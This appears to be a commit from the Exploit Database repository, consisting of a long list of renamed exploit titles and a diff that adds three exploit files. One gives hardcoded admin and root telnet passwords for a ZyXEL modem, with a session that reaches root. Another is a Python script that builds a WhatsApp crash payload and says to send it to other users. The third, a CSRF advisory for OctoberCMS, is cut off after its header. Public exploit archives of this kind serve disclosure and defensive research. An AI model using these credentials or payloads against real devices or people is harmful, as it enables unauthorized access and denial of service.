Methods Savant Web Server 3.1 - GET Remote Overflow (Universal) Savant Web Server 3.1 - GET Universal Remote Overflow ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow Apache Tomcat - WebDAV Remote File Disclosure (SSL) Apache Tomcat - WebDAV SSL Remote File Disclosure Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1) Linksys WRT54G Firmware 1.00.9 - Security Bypass (1) VideoLAN VLC Media Player 0.8.6d - httpd_FileCallBack Remote Format String VideoLAN VLC Media Player 0.8.6d - 'httpd_FileCallBack' Remote Format String Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (2) Linksys WRT54G Firmware 1.00.9 - Security Bypass (2) BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow Microsoft Windows Server - Code Execution (MS08-067) (Universal) Microsoft Windows Server - Universal Code Execution (MS08-067) SpeedStream 5200 - Authentication Bypass Config Download SpeedStream 5200 - Authentication Bypass Configuration Download GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC) GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption (PoC) Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Amaya 11.1 - W3C Editor/Browser 'defer' Stack Overflow XBMC 8.10 - get tag from file name Remote Buffer Overflow XBMC 8.10 - Get Tag From File Name Remote Buffer Overflow FTPDMIN 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study) FTPDMIN 0.96 (Windows XP SP3) - 'RNFR' Remote Buffer Overflow Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow (heap spray) Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow HeapSpray cPanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure cPanel - Authenticated 'lastvisit.html Domain' Arbitrary File Disclosure ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (1) Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (1) Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (2) Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2) Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Exploit VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow (Universal) VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Universal Buffer Overflow IBM Informix Client SDK 3.0 - nfx file integer Overflow IBM Informix Client SDK 3.0 - '.nfx' File Integer Overflow AOL 9.5 - ActiveX Exploit (Heap Spray) AOL 9.5 - ActiveX Heap Spray Exploit Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow (calc.exe) Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal) Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal) Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal) Magneto Net Resource ActiveX 4.0.0.5 - 'NetFileClose' Universal Exploit Magneto Net Resource ActiveX 4.0.0.5 - 'NetConnectionEnum' Universal Exploit Magneto Net Resource ActiveX 4.0.0.5 - 'NetShareEnum' Universal Exploit Barcodewiz Barcode ActiveX Control 3.29 - Remote Heap Spray Exploit (Internet Explorer 6/7) Barcodewiz Barcode ActiveX Control 3.29 - Remote HeapSpray Exploit (Internet Explorer 6/7) Advanced File Vault - 'eSellerateControl350.dll' ActiveX Heap Spray Advanced File Vault - 'eSellerateControl350.dll' ActiveX HeapSpray RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray) Easy FTP 1.7.0.11 - Buffer Overflow Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands RSP MP3 Player - OCX ActiveX Buffer Overflow HeapSpray Easy FTP 1.7.0.11 - 'NLST' / 'NLST -al' / 'APPE' / 'RETR' / 'SIZE' / 'XCWD' Buffer Overflow Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass Oracle JRE - java.net.URLConnection class Same-of-Origin 'SOP' Policy Bypass Microsoft Windows - Common Control Library (Comctl32) Heap Overflow (MS10-081) Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081) Majordomo2 - Directory Traversal (SMTP/HTTP) Majordomo2 - 'SMTP/HTTP' Directory Traversal Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit) Microsoft Outlook - ATTACH_BY_REF_ONLY File Execution (MS10-045) (Metasploit) Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit) Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit) Apache (mod_rewrite) - LDAP protocol Buffer Overflow (Metasploit) Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit) Zend Java Bridge - Remote Code Execution (ZDI-11-113) Zend Java Bridge - Remote Code Execution 7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities (Metasploit) 7-Technologies IGSS 9 - Data Server/Collector Packet Handling (Metasploit) TFTP Server 1.4 - ST (RRQ) Buffer Overflow WorldMail IMAPd 3.0 - Overflow (SEH) (Egg Hunter) TFTP Server 1.4 - ST 'RRQ' Buffer Overflow WorldMail IMAPd 3.0 - Overflow (SEH) (Egghunter) MailMax 4.6 - POP3 'USER' Remote Buffer Overflow (No Login Needed) MailMax 4.6 - POP3 'USER' Unauthenticated Remote Buffer Overflow AN-HTTPd 1.2b - CGI Vulnerabilities AN-HTTPd 1.2b - CGI Exploits Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution RedHat 6.1 / IRIX 6.5.18 - lpd Vulnerabilities RedHat 6.1 / IRIX 6.5.18 - 'lpd' Exploit Microsoft Windows Script Host 5.1/5.5 - GetObject() File Disclosure Microsoft Windows Script Host 5.1/5.5 - 'GetObject()' File Disclosure FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Apache 1.3 - Possible Directory Index Disclosure Apache 1.3 - Directory Index Disclosure Microsoft Outlook Express 6 - XML File Attachment Script Execution Microsoft Outlook Express 6 - '.XML' File Attachment Script Execution Microsoft Word 95/97/98/2000/2002 - INCLUDEPICTURE Document Sharing File Disclosure Microsoft Word 95/97/98/2000/2002 - 'INCLUDEPICTURE' Document Sharing File Disclosure Apache Tomcat 3/4 - DefaultServlet File Disclosure Apache Tomcat 3/4 - 'DefaultServlet' File Disclosure Apache Tomcat 3.x - Null Byte Directory/File Disclosure Apache Tomcat 3.x - Null Byte Directory / File Disclosure Clearswift MAILsweeper 4.x - Malformed MIME Attachment Filter Bypass Clearswift MAILsweeper 4.x - MIME Attachment Filter Bypass Aladdin Knowledge System Ltd - ChooseFilePath Buffer Overflow (Metasploit) Aladdin Knowledge System Ltd - 'ChooseFilePath' Buffer Overflow (Metasploit) Mod_Gzip 1.3.x - Debug Mode Vulnerabilities Mod_Gzip 1.3.x - Debug Mode Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun Vulnerabilities Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun Microsoft Internet Explorer 6 - Script Execution Vulnerabilities Microsoft Internet Explorer 6 - Script Execution OpenSSL - ASN.1 Parsing Vulnerabilities OpenSSL - ASN.1 Parsing Microsoft Outlook Express 6.0 - MHTML Forced File Execution (1) Microsoft Outlook Express 6.0 - '.MHTML' Forced File Execution (1) Sun J2EE/RI 1.4 / Sun JDK 1.4.2 - JDBC Database Insecure Default Policy Vulnerabilities Sun J2EE/RI 1.4 / Sun JDK 1.4.2 - JDBC Database Insecure Default Policy Sun Java Virtual Machine 1.x - Font.createFont Method Insecure Temporary File Creation Sun Java Virtual Machine 1.x - 'Font.createFont' Method Insecure Temporary File Creation Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' (WzTitle) Remote Exploit Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Exploit abctab2ps 1.6.3 - Write_Heading Function ABC File Remote Buffer Overflow abctab2ps 1.6.3 - 'Write_Heading' '.ABC' Remote Buffer Overflow abctab2ps 1.6.3 - Trim_Title Function ABC File Remote Buffer Overflow abctab2ps 1.6.3 - 'Trim_Title' '.ABC' File Remote Buffer Overflow PCAL 4.x - Calendar File getline Buffer Overflow PCAL 4.x - Calendar File get_holiday Buffer Overflow PCAL 4.x - Calendar File 'getline' Buffer Overflow PCAL 4.x - Calendar File 'get_holiday' Buffer Overflow Sun JavaMail 1.3.2 - MimeBodyPart.getFileName Directory Traversal Sun JavaMail 1.3.2 - 'MimeBodyPart.getFileName' Directory Traversal Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention Finjan SurfinGate 7.0 - '.ASCII' File Extension File Filter Circumvention Logic Print 2013 - Stack Overflow (vTable Overwrite) Logic Print 2013 - vTable Overwrite Stack Overflow EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Vulnerabilities EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution Mitsubishi MC-WorkX 8.02 - ActiveX Control 'IcoLaunch' File Execution Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution Vulnerabilities CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution Ability Mail Server 2013 (3.1.1) - Persistent Cross-Site Scripting (Web UI) Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting Microsoft - Tagged Image File Format (TIFF) Integer Overflow (Metasploit) Microsoft - Tagged Image File Format '.TIFF' Integer Overflow (Metasploit) Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow Sun Java Runtime Environment 1.6 - Web Start '.JNLP' File Stack Buffer Overflow Adobe Flash Player 8.0.24 - SWF File Handling Remote Code Execution Adobe Flash Player 8.0.24 - '.SWF' File Handling Remote Code Execution Multiple Browsers - URI Handlers Command Injection Vulnerabilities Multiple Browsers - URI Handlers Command Injection Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Stack Buffer Overflow LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Vulnerabilities LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution Adobe Flash Player 8/9.0.x - '.SWF' File 'DeclareFunction2' ActionScript Tag Remote Code Execution Trillian 3.1.9 - DTD File XML Parser Buffer Overflow Trillian 3.1.9 - '.DTD' File XML Parser Buffer Overflow Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass Vulnerabilities Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass ProFTPd 1.3 - 'mod_sql Username' SQL Injection ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection Apple Safari for iPhone/iPod touch - Malformed 'Throw' Exception Remote Code Execution Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution Apple Safari for iPhone/iPod touch - 'Throw' Exception Remote Code Execution Apple Safari iPhone/iPod touch - Webpage Remote Code Execution PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Multiple Check Point Endpoint Security Products - Information Disclosure Vulnerabilities Multiple Check Point Endpoint Security Products - Information Disclosure Bsplayer 2.68 - HTTP Response Exploit (Universal) Bsplayer 2.68 - HTTP Response Universal Exploit Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass with ROP) Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass + ROP) Microsoft Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112) Microsoft Internet Explorer 9/10/11 - 'CDOMStringDataList::InitFromString' Out-of-Bounds Read (MS15-112) Acunetix WVS 10 - Remote Command Execution (System) Acunetix WVS 10 - Remote Command Execution Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039) Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution ZyXEL PK5001Z Modem - Backdoor Account PHP-Nuke - SQL Injection Edit/Save Message(s) PHP-Nuke - SQL Injection Edit/Save Messages phpBB - highlight Arbitrary File Upload (Santy.A) phpBB - highlight Arbitrary File Upload 'Santy.A' phpBB 2.0.10 - Bot Install (Altavista) (ssh.D.Worm) phpBB 2.0.10 - Bot Install Altavista 'ssh.D.Worm' Invision Power Board 2.0.3 - 'login.php' SQL Injection (tutorial) Invision Power Board 2.0.3 - 'login.php' SQL Injection phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (cookie grabber) phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber) vBulletin 3.0.8 - Accessible Database Backup Searcher (update 3) vBulletin 3.0.8 - Accessible Database Backup Searcher (3) ibProArcade 2.x - module (vBulletin/IPB) SQL Injection ibProArcade 2.x - module 'vBulletin/IPB' SQL Injection Website Baker 2.6.0 - Login Bypass / Remote Code Execution Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution WebWiz Products 1.0/3.06 - Login Bypass (SQL Injection) WebWiz Products 1.0/3.06 - Authentication Bypass / SQL Injection Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection Woltlab Burning Board 2.x - Datenbank MOD 'fileid' SQL Injection phpCommunityCalendar 4.0.3 - Multiple (Cross-Site Scripting / SQL Injection) Vulnerabilities phpCommunityCalendar 4.0.3 - Cross-Site Scripting / SQL Injection BASE 1.2.4 - melissa (Snort Frontend) Remote File Inclusion BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion E Annu 1.0 - Login Bypass (SQL Injection) E Annu 1.0 - Authentication Bypass / SQL Injection ASP Smiley 1.0 - 'default.asp' Login Bypass 'SQL Injection' ASP Smiley 1.0 - 'default.asp' Authentication Bypass / SQL Injection paFileDB 3.5.2/3.5.3 - Remote Login Bypass (SQL Injection) paFileDB 3.5.2/3.5.3 - Remote Authentication Bypass / SQL Injection e107 0.7.8 - 'mailout.php' Access Escalation Exploit (Admin needed) e107 0.7.8 - 'mailout.php' Authenticated Access Escalation Exploit TaskDriver 1.2 - Login Bypass / SQL Injection TaskDriver 1.2 - Authentication Bypass / SQL Injection IBM Rational ClearQuest - Web Login Bypass (SQL Injection) IBM Rational ClearQuest - Web Authentication Bypass / SQL Injection Joomla! Component JoomlaXplorer 1.6.2 - Remote Vulnerabilities Joomla! Component JoomlaXplorer 1.6.2 - Remote Exploits Xomol CMS 1.2 - Login Bypass / Local File Inclusion Xomol CMS 1.2 - Authentication Bypass / Local File Inclusion cPanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass) cPanel 11.x - 'Fantastico' Local File Inclusion mxCamArchive 2.2 - Bypass Config Download mxCamArchive 2.2 - Bypass Configuration Download All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit All Club CMS 0.0.2 - Remote Database Configuration Retrieve Exploit OraMon 2.0.1 - Remote Config File Disclosure OraMon 2.0.1 - Remote Configuration File Disclosure Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP code writing Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP Code Writing phpScribe 0.9 - 'user.cfg' Remote Config Disclosure phpScribe 0.9 - 'user.cfg' Remote Configuration Disclosure BlogHelper - Remote Config File Disclosure PollHelper - Remote Config File Disclosure BlogHelper - Remote Configuration File Disclosure PollHelper - Remote Configuration File Disclosure QuoteBook - Remote Config File Disclosure QuoteBook - Remote Configuration File Disclosure Free Joke Script 1.0 - Authentication Bypass / SQL Injection Free Joke Script 1.0 - Authentication Bypass Grestul 1.x - Authentication Bypass (Cookie SQL Injection) Grestul 1.x - Cookie Authentication Bypass S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities smNews 1.0 - Authentication Bypass / Column Truncation Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload Free Arcade Script 1.0 - Authentication Bypass / Arbitrary File Upload phpAdBoard - 'conf.inc' Remote Config File Disclosure phpAdBoard - 'conf.inc' Remote Configuration File Disclosure W2B Restaurant 1.2 - 'conf.inc' Config File Disclosure phpAdBoardPro - 'config.inc' Config File Disclosure W2B Restaurant 1.2 - 'conf.inc' Configuration File Disclosure phpAdBoardPro - 'config.inc' Configuration File Disclosure Job2C - 'conf.inc' Config File Disclosure Job2C - 'conf.inc' Configuration File Disclosure chCounter 3.1.3 - (Authentication Bypass) SQL Injection chCounter 3.1.3 - Authentication Bypass The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup The Recipe Script 5 - Authentication Bypass / Database Backup Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection Mlffat 2.1 - Cookie Authentication Bypass my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection my-colex 1.4.2 - Authentication Bypass / SQL Injection / Cross-Site Scripting Flash Image Gallery 1.1 - Arbitrary Config File Disclosure Flash Image Gallery 1.1 - Arbitrary Configuration File Disclosure Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection Traidnt Up 2.0 - Cookie Authentication Bypass LightNEasy sql/no-db 2.2.x - System Config Disclosure LightNEasy sql/no-db 2.2.x - System Configuration Disclosure MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection MD-Pro 1.083.x - Survey Module 'pollID' Blind SQL Injection WHOISCART - (Authentication Bypass) Information Disclosure WHOISCART - Authentication Bypass / Information Disclosure ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition / Information Disclosure mobilelib gold 3.0 - Authentication Bypass / SQL Injection Mobilelib Gold 3.0 - Authentication Bypass / SQL Injection Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection Arab Portal 2.2 - Blind Cookie Authentication Bypass Joomla! Component com_surveymanager 1.5.0 - SQL Injection (stype) Joomla! Component com_surveymanager 1.5.0 - 'stype' SQL Injection Joomla! Component com_virtuemart 1.0 - SQL Injection (Product_ID) Joomla! Component com_virtuemart 1.0 - 'Product_ID' SQL Injection Pre Job Board 1.0 - SQL Authentication Bypass Pre Job Board 1.0 - Authentication Bypass Pre Jobo .NET - SQL Authentication Bypass Pre Jobo .NET - Authentication Bypass SoftCab Sound Converter - ActiveX Insecure Method Exploit (sndConverter.ocx) SoftCab Sound Converter - 'sndConverter.ocx' ActiveX Insecure Method Exploit WSC CMS - (Authentication Bypass) SQL Injection WSC CMS - Authentication Bypass Joomla! Component dcsFlashGames 2.0RC1 - SQL Injection (catid) Joomla! Component dcsFlashGames 2.0RC1 - 'catid' SQL Injection 3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal) 3Com* iMC (Intelligent Management Center) - Unauthenticated Traversal File Retrieval Yamamah Photo Gallery 1.00 - SQL Injection (calbums) Yamamah Photo Gallery 1.00 - 'calbums' SQL Injection Elite Gaming Ladders 3.5 - SQL Injection (ladder[id]) Elite Gaming Ladders 3.5 - 'ladder[id]' SQL Injection Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Configuration Cross-Site Request Forgery AV Arcade 3 - Cookie SQL Injection / Authentication Bypass AV Arcade 3 - Cookie Authentication Bypass MODx REvolution CMS 2.0.4-pl2 - Cross-Site Scripting (POST Injection) MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting Vulnerabilities appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting ExtCalendar2 - (Authentication Bypass / Cookie) SQL Injection ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload Seotoaster - SQL Injection Admin Login Bypass Seotoaster - SQL Injection BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities BBS E-Market Professional bf_130 1.3.0 - Multiple File Disclosure Vulnerabilities phpBB 1.x/2.0.x - '(Knowledge Base Module) 'KB.php' SQL Injection phpBB 1.x/2.0.x - Knowledge Base Module 'KB.php' SQL Injection PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution Spid 1.3 - lang_path File Inclusion Spid 1.3 - 'lang_path' File Inclusion NETGEAR WPN824v3 - Unauthorized Config Download NETGEAR WPN824v3 - Unauthorized Configuration Download TWiki 4.0.x - Viewfile Directory Traversal TWiki 4.0.x - 'Viewfile' Directory Traversal ZonPHP 2.25 - Remote Code Execution (Remote Code Execution) ZonPHP 2.25 - Remote Code Execution pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass Vulnerabilities LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass geoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion geoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion GeoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion GeoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting Vulnerabilities LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset) Ability Mail Server 2013 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Password Reset) WiFiles HD 1.3 iOS - Locla File Inclusion WiFiles HD 1.3 iOS - Local File Inclusion IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure Vulnerabilities IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass Vulnerabilities H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection Vulnerabilities IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting Vulnerabilities Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit) Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python) vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion / SQL Injection / Cross-Site Scripting vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting ZTE F660 - Remote Config Download ZTE F660 - Remote Configuration Download Tango DropBox 3.1.5 + PRO - Activex Heap Spray Tango FTP 1.0 (Build 136) - Activex Heap Spray Tango DropBox 3.1.5 + PRO - Activex HeapSpray Tango FTP 1.0 (Build 136) - Activex HeapSpray Pinterestclones - Security Bypass / HTML Injection Vulnerabilities Pinterestclones - Security Bypass / HTML Injection Privoxy Proxy - Authentication Information Disclosure Vulnerabilities Privoxy Proxy - Authentication Information Disclosure ZTE ZXHN H108N Router - Unauthenticated Config Disclosure ZTE ZXHN H108N Router - Unauthenticated Configuration Disclosure Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection (XXE) Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection Kodi 15 - Arbitrary File Access (Web Interface) Kodi 15 - Web Interface Arbitrary File Access ( OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit OpenMRS 2.3 (1.11.4) - XML External Entity Processing Exploit OctoberCMS 1.0.426 (Build 426) - Cross-Site Request Forgery Ingenious School Management System 2.3.0 - 'friend_index' SQL injection
This commit is contained in:
Offensive Security
parent
33cc894818
commit
c66d2f584e
7 changed files with 633 additions and 404 deletions
41
platforms/hardware/remote/43105.txt
Executable file
41
platforms/hardware/remote/43105.txt
Executable file
|
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password.
|
||||
# Google Dork: n/a
|
||||
# Date: 2017-10-31
|
||||
# Exploit Author: Matthew Sheimo
|
||||
# Vendor Homepage: https://www.zyxel.com/
|
||||
# Software Link: n/a
|
||||
# Version: PK5001Z 2.6.20.19
|
||||
# Tested on: Linux
|
||||
# About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world.
|
||||
# Linked CVE's: CVE-2016-10401
|
||||
|
||||
|
||||
Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet
|
||||
|
||||
username: admin
|
||||
password: CenturyL1nk
|
||||
|
||||
Escalate to root with 'su' and this password.
|
||||
|
||||
password: zyad5001
|
||||
|
||||
|
||||
[root:/]# telnet 192.168.0.1
|
||||
Trying 192.168.0.1...
|
||||
Connected to 192.168.0.1.
|
||||
Escape character is '^]'.
|
||||
|
||||
PK5001Z login: admin
|
||||
Password: CenturyL1nk
|
||||
$ whoami
|
||||
admin_404A03Tel
|
||||
$ su
|
||||
Password: zyad5001
|
||||
# whoami
|
||||
root
|
||||
# uname -a
|
||||
Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
|
||||
# cat /etc/zyfwinfo
|
||||
Vendor Name: ZyXEL Communications Corp.
|
||||
|
||||
|
||||
51
platforms/ios/dos/43107.py
Executable file
51
platforms/ios/dos/43107.py
Executable file
|
|
@ -0,0 +1,51 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
# Found this and more exploits on my open source security project: http://www.exploitpack.com
|
||||
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
|
||||
# Date and time of release: 11 October 2017
|
||||
#
|
||||
# Tested on: iPhone 5/6s iOS 10.3.3 and 11
|
||||
#
|
||||
# Description:
|
||||
# WhatsApp 2.17.52 and prior is prone to a remote memory corruption.
|
||||
# This type of attacks are possible if the program uses memory inefficiently and does not impose limits on the amount of state used when necessary.
|
||||
#
|
||||
# Impact:
|
||||
# Resource exhaustion attacks exploit a design deficiency. An attacker could exploit this vulnerability to remotely corrupt the memory of the application forcing an uhandled exception
|
||||
# in the context of the application that could potentially result in a denial-of-service condition and/or remote memory corruption.
|
||||
#
|
||||
# Warning note:
|
||||
# Once a user receives the offending message it will automatically crash the application and if its restarted it will crash again until the message its manually removed from the user's history.
|
||||
#
|
||||
# Timeline:
|
||||
# 09/13/2017 - Research started
|
||||
# 09/13/2017 - First proof of concept
|
||||
# 09/15/2017 - Reported to Whatsapp
|
||||
# 09/20/2017 - Report Triaged by Facebook
|
||||
# 11/01/2017 - Facebook never replied back with a status fix
|
||||
# 11/01/2017 - Disclosure as zero day
|
||||
# Vendor homepage: http://www.whatsapp.com
|
||||
import sys
|
||||
reload(sys)
|
||||
|
||||
def whatsapp(filename):
|
||||
sys.setdefaultencoding("utf-8")
|
||||
payload = u'ب ة ت ث ج ح خ د ذ ر ز س ش ص ض ط ظ ع غ ف ق ك ل م ن' * 1337
|
||||
sutf8 = payload.encode('UTF-8')
|
||||
print "[*] Writing to file: " + filename
|
||||
open(filename, 'w').write(payload)
|
||||
print "[*] Done."
|
||||
|
||||
def howtouse():
|
||||
print "Usage: whatsapp.py [FILENAME]"
|
||||
print "[*] Mandatory arguments:"
|
||||
print "[-] FILENAME"
|
||||
sys.exit(-1)
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
print "[*] WhatsApp 2.17.52 iOS - Remote memory corruption by Juan Sacco"
|
||||
print "[*] How to use: Copy the content of the file and send it as a message to another whatsapp user or group"
|
||||
whatsapp(sys.argv[1])
|
||||
except IndexError:
|
||||
howtouse()
|
||||
49
platforms/php/webapps/43106.txt
Executable file
49
platforms/php/webapps/43106.txt
Executable file
|
|
@ -0,0 +1,49 @@
|
|||
# Exploit Title: OctoberCMS 1.0.426 - CSRF to Admin Account Takover
|
||||
# Vendor Homepage: https://octobercms.com
|
||||
# Software Link: https://octobercms.com/download
|
||||
# Exploit Author: Zain Sabahat
|
||||
# Website: https://about.me/ZainSabahat
|
||||
# Category: webapps
|
||||
# CVE: CVE-2017-16244
|
||||
|
||||
1. Description
|
||||
|
||||
